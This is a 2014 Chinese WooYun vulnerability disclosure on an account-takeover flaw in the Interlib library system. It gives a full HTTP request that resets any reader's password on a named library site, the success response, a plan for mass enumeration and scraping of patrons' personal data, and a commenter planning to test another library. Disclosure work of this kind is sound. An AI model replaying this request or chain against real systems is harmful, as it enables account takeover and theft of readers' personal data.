当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-050528

漏洞标题:Interlib图书馆系统读者密码任意修改

相关厂商:广州图创计算机软件开发有限公司

漏洞作者: happylyang

提交时间:2014-02-09 21:02

修复时间:2014-02-19 21:02

公开时间:2014-02-19 21:02

漏洞类型:设计缺陷/逻辑错误

危害等级:中

自评Rank:8

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-02-09: 细节已通知厂商并且等待厂商处理中
2014-02-19: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

读者登陆密码可以任意修改。

详细说明:

今天去我市图书馆办了张借书卡,顺便看了下图书馆的网站,在wooyun发现以前白帽子发的sql注射,试了下没有成功,可能是更新了?然后发现
1、修改个人资料的地方,虽然身份证号码是disable输入,但修改下html就可以更改身份证号...
2、密码任意修改
测试了几个图书馆的,都可以实现任意修改...
构造类似下面的数据包,以湖南图书馆为例,

POST /opac/reader/updatePassword HTTP/1.1
Host: opac.library.hn.cn
Proxy-Connection: keep-alive
Content-Length: 27
Accept: */*
Origin: http://opac.library.hn.cn
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.107 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://opac.library.hn.cn/opac/reader/getReaderInfo
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,ja;q=0.4,zh-TW;q=0.2
Cookie: JSESSIONID=4FFB8E9FE57DB701AFED3BF53054CCA0
rdid=******&password=888888


rdid为读者的借书号,password为密码,就可以随便改了...
看到wooyun以前发的这个图书馆系统的sql注射的漏洞,说200w信息的泄露,其实这个也可以啊,枚举读者借书号—>重置密码—>模拟登陆—>抓取相关信息—>存入文件,不过,哈哈哈。。

漏洞证明:

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/text;charset=UTF-8
Date: Sun, 09 Feb 2014 11:58:32 GMT
Content-Length: 52
更新密码成功,注销后即可用新密码登陆

修复方案:

修改密码以前先判断下是不是本人的账号吧

版权声明:转载请注明来源 happylyang@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-02-19 21:02

厂商回复:

最新状态:

暂无


漏洞评价:

评论

  1. 2014-02-09 22:18 | 动后河 ( 实习白帽子 | Rank:51 漏洞数:13 | ☭)

    爱学习的好洞主

  2. 2014-02-19 21:34 | 小飞 ( 实习白帽子 | Rank:37 漏洞数:12 | 挖洞对于16岁的我来说实在是太艰难了!10...)

    表示我这边武汉图书馆也是,以后试试

  3. 2014-02-19 22:11 | 小小 ( 路人 | Rank:20 漏洞数:3 | 学习中...)

    Oh yeah!